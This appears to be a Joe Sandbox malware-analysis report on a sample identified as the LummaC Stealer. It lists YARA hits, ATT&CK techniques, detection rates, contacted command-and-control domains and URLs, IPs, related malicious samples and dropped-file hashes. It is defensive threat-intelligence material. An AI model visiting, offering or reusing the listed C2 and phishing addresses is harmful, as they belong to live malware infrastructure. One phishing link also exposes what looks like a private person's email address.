Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Directory queried: C:\Users\user\Documents\QFAPOWPAFG	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Directory queried: C:\Users\user\Documents\QFAPOWPAFG	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Directory queried: C:\Users\user\Documents\CZQKSDDMWR	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Directory queried: C:\Users\user\Documents\CZQKSDDMWR	Jump to behavior

Source: Yara match

File source: Process Memory Space: setupx 2.exe1.exe PID: 5712, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: setupx 2.exe1.exe PID: 5712, type: MEMORYSTR
Source: Yara match	File source: 3.2.setupx 2.exe1.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.setupx 2.exe1.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2242806640.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1062249228.000000000304A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	12 Windows Management Instrumentation	1 DLL Side-Loading	211 Process Injection	22 Virtualization/Sandbox Evasion	2 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Screen Capture	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	211 Process Injection	LSASS Memory	251 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Deobfuscate/Decode Files or Information	Security Account Manager	22 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	41 Data from Local System	113 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	4 Obfuscated Files or Information	NTDS	1 Process Discovery	Distributed Component Object Model	3 Clipboard Data	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	2 Software Packing	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	11 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	33 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
setupx 2.exe1.exe	49%	Virustotal		Browse
setupx 2.exe1.exe	66%	ReversingLabs	Win32.Trojan.LummaC
setupx 2.exe1.exe	100%	Avira	TR/Crypt.Agent.ftjht

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://citydisco.bet/0l&1&	0%	Avira URL Cloud	safe
https://citydisco.bet/5	0%	Avira URL Cloud	safe
https://citydisco.bet/gdJISde(z	0%	Avira URL Cloud	safe
https://citydisco.bet:443/gdJIS	100%	Avira URL Cloud	malware
https://citydisco.bet:443/gdJISP	0%	Avira URL Cloud	safe
https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
citydisco.bet	188.114.96.3	true	false		high

Contacted URLs

Name	Malicious	Reputation
mrodularmall.top/aNzS	false	high
bugildbett.top/bAuz	false	high
jowinjoinery.icu/bdWUa	false	high
legenassedk.top/bdpWO	false	high
citydisco.bet/gdJIS	false	high
featureccus.shop/bdMAn	false	high
htardwarehu.icu/Sbdsa	false	high
https://citydisco.bet/gdJIS	false	high
cjlaspcorne.icu/DbIps	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0	setupx 2.exe1.exe, 00000003.00000003.1063219252.0000000000D4C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://citydisco.bet:443/gdJIS	setupx 2.exe1.exe, 00000003.00000003.1061156152.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://duckduckgo.com/ac/?q=	setupx 2.exe1.exe, 00000003.00000003.1014672869.00000000032AA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://citydisco.bet/5	setupx 2.exe1.exe, 00000003.00000003.1087780210.0000000000D0F000.00000004.00000020.00020000.00000000.sdmp, setupx 2.exe1.exe, 00000003.00000003.1084939054.0000000000CF9000.00000004.00000020.00020000.00000000.sdmp, setupx 2.exe1.exe, 00000003.00000003.1088036610.0000000000D13000.00000004.00000020.00020000.00000000.sdmp, setupx 2.exe1.exe, 00000003.00000003.1128257030.0000000000D14000.00000004.00000020.00020000.00000000.sdmp, setupx 2.exe1.exe, 00000003.00000002.2244132825.0000000000D14000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.	setupx 2.exe1.exe, 00000003.00000003.1063219252.0000000000D4C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	setupx 2.exe1.exe, 00000003.00000003.1014672869.00000000032AA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	setupx 2.exe1.exe, 00000003.00000003.1061751941.0000000003290000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ac.ecosia.org?q=	setupx 2.exe1.exe, 00000003.00000003.1014672869.00000000032AA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://upx.sf.net	Amcache.hve.6.dr	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	setupx 2.exe1.exe, 00000003.00000003.1014672869.00000000032AA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.rootca1.amazontrust.com0:	setupx 2.exe1.exe, 00000003.00000003.1061751941.0000000003290000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	setupx 2.exe1.exe, 00000003.00000003.1062884184.00000000035B1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_alldp.ico	setupx 2.exe1.exe, 00000003.00000003.1014672869.00000000032AA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/v20	setupx 2.exe1.exe, 00000003.00000003.1014672869.00000000032AA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://citydisco.bet/	setupx 2.exe1.exe, 00000003.00000003.1778410150.0000000000C9C000.00000004.00000020.00020000.00000000.sdmp, setupx 2.exe1.exe, 00000003.00000003.1061477221.0000000000CFB000.00000004.00000020.00020000.00000000.sdmp, setupx 2.exe1.exe, 00000003.00000003.1061156152.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, setupx 2.exe1.exe, 00000003.00000003.1087834589.0000000000C9C000.00000004.00000020.00020000.00000000.sdmp, setupx 2.exe1.exe, 00000003.00000003.1128257030.0000000000D14000.00000004.00000020.00020000.00000000.sdmp, setupx 2.exe1.exe, 00000003.00000002.2244132825.0000000000D14000.00000004.00000020.00020000.00000000.sdmp, setupx 2.exe1.exe, 00000003.00000003.1013191899.0000000000CAE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://citydisco.bet/0l&1&	setupx 2.exe1.exe, 00000003.00000002.2244132825.0000000000D14000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	setupx 2.exe1.exe, 00000003.00000003.1063219252.0000000000D4C000.00000004.00000020.00020000.00000000.sdmp	false		high
http://x1.c.lencr.org/0	setupx 2.exe1.exe, 00000003.00000003.1061751941.0000000003290000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	setupx 2.exe1.exe, 00000003.00000003.1061751941.0000000003290000.00000004.00000800.00020000.00000000.sdmp	false		high
https://citydisco.bet:443/gdJISP	setupx 2.exe1.exe, 00000003.00000003.1127914685.0000000000CFB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/chrome_newtabv20	setupx 2.exe1.exe, 00000003.00000003.1014672869.00000000032AA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	setupx 2.exe1.exe, 00000003.00000003.1014672869.00000000032AA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.rootca1.amazontrust.com/rootca1.cer0?	setupx 2.exe1.exe, 00000003.00000003.1061751941.0000000003290000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u	setupx 2.exe1.exe, 00000003.00000003.1063219252.0000000000D4C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9e	setupx 2.exe1.exe, 00000003.00000003.1063219252.0000000000D4C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg	setupx 2.exe1.exe, 00000003.00000003.1063219252.0000000000D4C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://citydisco.bet/gdJISde(z	setupx 2.exe1.exe, 00000003.00000003.1128257030.0000000000D14000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org/products/firefoxgro.all	setupx 2.exe1.exe, 00000003.00000003.1062884184.00000000035B1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	setupx 2.exe1.exe, 00000003.00000003.1014672869.00000000032AA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://gemini.google.com/app?q=	setupx 2.exe1.exe, 00000003.00000003.1014672869.00000000032AA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&cta	setupx 2.exe1.exe, 00000003.00000003.1063219252.0000000000D4C000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
188.114.96.3	citydisco.bet	European Union		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1637272
Start date and time:	2025-03-13 13:32:22 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 9s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	18
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	setupx 2.exe1.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/6@1/1
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 96% Number of executed functions: 18 Number of non-executed functions: 142
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, sppsvc.exe, WerFault.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 104.40.67.19, 20.190.159.130, 4.175.87.197, 23.60.203.209, 52.149.20.212
Excluded domains from analysis (whitelisted): fs.microsoft.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, c.pki.goog, onedsblobvmssprdwus04.westus.cloudapp.azure.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target setupx 2.exe1.exe, PID 6952 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
08:33:32	API Interceptor	7x Sleep call for process: setupx 2.exe1.exe modified
08:33:37	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
188.114.96.3	kVPzMgJglW.exe	Get hash	malicious	FormBook	Browse	www.serenityos.dev/dntg/
	tnZI8EzSx3.exe	Get hash	malicious	FormBook	Browse	www.fkrvhaupjtc.info/sdhm/
	7zKn77RsRX.exe	Get hash	malicious	FormBook	Browse	www.serenityos.dev/dntg/
	hQaXUS5gt0.exe	Get hash	malicious	FormBook	Browse	www.serenityos.dev/dntg/
	zzSk99EqY0.exe	Get hash	malicious	FormBook	Browse	www.fkrvhaupjtc.info/sdhm/
	2k3GtCY6Zz.exe	Get hash	malicious	FormBook	Browse	www.fkrvhaupjtc.info/nhmj/
	3tEL1ZRXA6.exe	Get hash	malicious	FormBook	Browse	www.marposet.shop/6ixs/?Ar6T=oN0T/Esi7H2jJ4TMjw8b93BQPnEdNzyQiBUPeT1k8Z/eibB9ghV+qpvP7NsuhjacLnuX6HraU4xmdMUu2umYnCC8s1rtYFvj99qSyPPCwvQggIKSHQ==&Lfpd=o6ndcl
	2rvyZc27tz.exe	Get hash	malicious	FormBook	Browse	www.timeinsardinia.info/50g8/
	INVOICE 4562.exe	Get hash	malicious	FormBook	Browse	www.timeinsardinia.info/jjft/
	Payment-031025-pdf.exe	Get hash	malicious	FormBook	Browse	www.ezjytrkuqlw.info/zsr7/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
citydisco.bet	SoftWare(1).exe1.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.96.3
	Galaxy Swapper v2.0.3.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.97.3
	13s1HMkHKv.exe	Get hash	malicious	Amadey, DarkVision Rat, Fallen Miner, LummaC Stealer	Browse	188.114.96.3
	SoftWare(1).exe	Get hash	malicious	LummaC Stealer	Browse	188.114.97.3
	Kiddion's Modest Menu v.1.0.0.exe	Get hash	malicious	LummaC Stealer, Xmrig	Browse	188.114.96.3
	Launcher_v2.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.96.3
	ModMenu.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.96.3
	SpaceCheatFort.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.97.3
	Setup.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.97.3
	SpaceCheatFort.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.97.3

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	SimpleLoader v2.1.exe1.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.144.37
	SoftWare(1).exe1.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.96.3
	https://llttfr.boa.ink/?fr=gemma.inglis@heritageportfolio.co.uk	Get hash	malicious	Unknown	Browse	104.17.25.14
	2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.96.1
	https://qrsu.io/ONKMx	Get hash	malicious	Unknown	Browse	104.17.24.14
	PO_L202503042.html	Get hash	malicious	Unknown	Browse	104.18.186.31
	Dean Cartlidge_mthxvj.html	Get hash	malicious	HTMLPhisher	Browse	172.66.0.227
	Steam.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	104.20.3.235
	http://observalgerie.com	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	172.67.41.60
	https://trustwalletrate.com	Get hash	malicious	Unknown	Browse	172.67.74.152

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	SimpleLoader v2.1.exe1.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.96.3
	SoftWare(1).exe1.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.96.3
	script5.ps1	Get hash	malicious	LummaC Stealer	Browse	188.114.96.3
	PO #S149102025.xlsx	Get hash	malicious	Unknown	Browse	188.114.96.3
	ppcore.dll.dll	Get hash	malicious	Unknown	Browse	188.114.96.3
	ppcore.dll.dll	Get hash	malicious	Unknown	Browse	188.114.96.3
	DE-10192.pdf.lnk.download.lnk	Get hash	malicious	Unknown	Browse	188.114.96.3
	xo.bat	Get hash	malicious	Unknown	Browse	188.114.96.3
	Document25.xlsm	Get hash	malicious	ScreenConnect Tool, AsyncRAT, StormKitty, VenomRAT	Browse	188.114.96.3
	Launcher.exe	Get hash	malicious	LummaC Stealer, RHADAMANTHYS, Xmrig	Browse	188.114.96.3

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_setupx 2.exe1.ex_b960bcf5c1ad9c718bf922e3d60b4e76a167a2d_a301da1a_86186d1a-3de1-4e84-b5f3-cb69f66ea0fb\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9199314324791464
Encrypted:	false
SSDEEP:	96:c0Ftm2So2cFSsA6h+oI7Rg6tQXIDcQvc6QcEVcw3cE/94048+HbHg/1AnQECaVDa:9nmoSk0BU/AjICBqzuiF4Z24IO83x2I
MD5:	8CCD846F2638C21DE14DD9FF791911AE
SHA1:	DAAA247A5A1C9AA7A3A91CC781C9697E5DD73006
SHA-256:	83251638FDF9F6AB8FAF5E17F53C4B82DAD4DE57015AC2D6CB0B6E35985814D9
SHA-512:	67A40352363622EBE75C7458CAA552E651E0AE828512A80BFC9A72D6CE0B4F1E4957E9219532D547B9026D326AF99C00C166A2623E4ECB8EC1391C242BD01F1F
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.6.3.4.2.8.1.0.8.9.1.6.3.5.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.6.3.4.2.8.1.1.8.7.6.0.0.6.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.6.1.8.6.d.1.a.-.3.d.e.1.-.4.e.8.4.-.b.5.f.3.-.c.b.6.9.f.6.6.e.a.0.f.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.d.4.5.e.2.d.6.-.2.2.3.3.-.4.2.f.d.-.a.6.c.4.-.a.2.6.e.5.e.3.c.6.8.2.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.s.e.t.u.p.x. .2...e.x.e.1...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.4.4.-.0.0.0.1.-.0.0.1.8.-.1.7.a.1.-.3.b.2.0.1.4.9.4.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.d.c.d.7.6.e.3.7.3.5.2.0.8.f.9.b.0.1.9.4.1.b.8.9.b.7.5.d.c.d.8.e.0.0.0.0.f.f.f.f.!.0.0.0.0.7.0.5.7.6.0.f.3.1.5.4.7.9.9.b.a.9.c.e.1.7.f.2.7.d.c.2.2.b.c.d.c.1.f.5.1.9.5.2.6.!.s.e.t.u.p.x. .2...e.x.e.1...e.x.e.....T.a.r.g.e.t.A.p.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1315.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Thu Mar 13 12:33:31 2025, 0x1205a4 type
Category:	dropped
Size (bytes):	31168
Entropy (8bit):	2.249240480488949
Encrypted:	false
SSDEEP:	192:iR40XDiYXFFvbOYs3/D9jMbUHVsA9LQ+B+YBdjn:yZiWiL3r9jMCaA9LeYB1
MD5:	E5EC2789129C8E79D85D1EEDF0D3E0F4
SHA1:	AD8755B06978EFC4F32171BE510F7FE5B478B23F
SHA-256:	93FDA98BC0887B04849C0A9531D03387B8F3B19AC440BFE48AF263A7BB6EE61D
SHA-512:	E8CB08E35AD17BC262D38A8F50586D2057587A5743CE87FFA59B926EDBDD1CBA3AA14C6B9091B75FA677AFD9F1A4DAC0693AD616CC7C0675412EB5FE45B641C8
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... ..........g............4...............<.......T...F'..........T.......8...........T................^..........<...........(...............................................................................eJ..............GenuineIntel............T.......D......g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1410.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8420
Entropy (8bit):	3.6975323427731936
Encrypted:	false
SSDEEP:	192:R6l7wVeJk86X6Y+CSU9lgmfeTprx89bH1sfumiNm:R6lXJ/6X6Y7SU9lgmfeAHOfRx
MD5:	A4AEEC122D982D4C27C3A8BF81440067
SHA1:	C1AD13582B4DA4A9AE6103D563C144D11394B5EC
SHA-256:	3ECB652C07A454D762CC7357990CE9E872F565D93251D494370BD9476BAE0322
SHA-512:	6F4F66FC4194CD22352FE7F7AB572184F7DC1D3996889A4DCD9FFB28D626A1812301F4BC0A4B9504ACB919E3DD1675E17400E6A8B2D9CC20380F25217CB5CDB2
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.7.2.4.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER147F.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4735
Entropy (8bit):	4.474027914849769
Encrypted:	false
SSDEEP:	48:cvIwWl8zsQtJg77aI9v8WpW8VYDnYm8M4JlUFJc+q8vw0Deedyed:uIjfWI7N17VbJkcKB7yed
MD5:	45EB54FD329877A7630212D16DF139F5
SHA1:	733B310C0F51459D54DD01F2DADF7D21FD61A2EF
SHA-256:	A13E1713C495A0613A868A9C094A6357CE10C470CD05E9305C00913DC40E6BEF
SHA-512:	B4A41B2BB70B75FC7E0195A206F792869DEC83B31BE1EF86428CA2646F92818318A9A8869B1ABF2699B5EAFC1415683E87847EE4CB4B7796153644A631F0E552
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="759096" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.421353603531967
Encrypted:	false
SSDEEP:	6144:g+ifpi6ceLPL9skLmb0mYSWSPtaJG8nAgexk8tq2QqZaKqFIeC/7ocXltAx:Ti58YSWIZLI2QqYwj11Cx
MD5:	CDE38007781F5699DB164DE7017C0697
SHA1:	5D2B01FA51E8030EE046E505B8B7E3BD1A946D04
SHA-256:	1F0FBFCA3C714DD0FCCAACF0077D72CFABC72D1F24133CDCB108B19969E75638
SHA-512:	E432A89E6901027E4762CE417944589D91370AF02BA702113C8F52F0D3E77A00164382B930525E76B44238ED96497F37130CD43B91EA33328349177BAAEDF302
Malicious:	false
Reputation:	low
Preview:	regfH...H....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm....d...............................................................................................................................................................................................................................................................................................................................................Xi..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve.LOG1

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	24576
Entropy (8bit):	4.3240229430539
Encrypted:	false
SSDEEP:	384:1Ec+AKioyyQMRJHU/sN/HgLyuN9dQqlCdKqa7bs9NYDrK:1wADoyFMRJHYsN/HVi9LlCdra7bs9NYy
MD5:	1823FE7B41EC3ED84D67AEFD5D901DE1
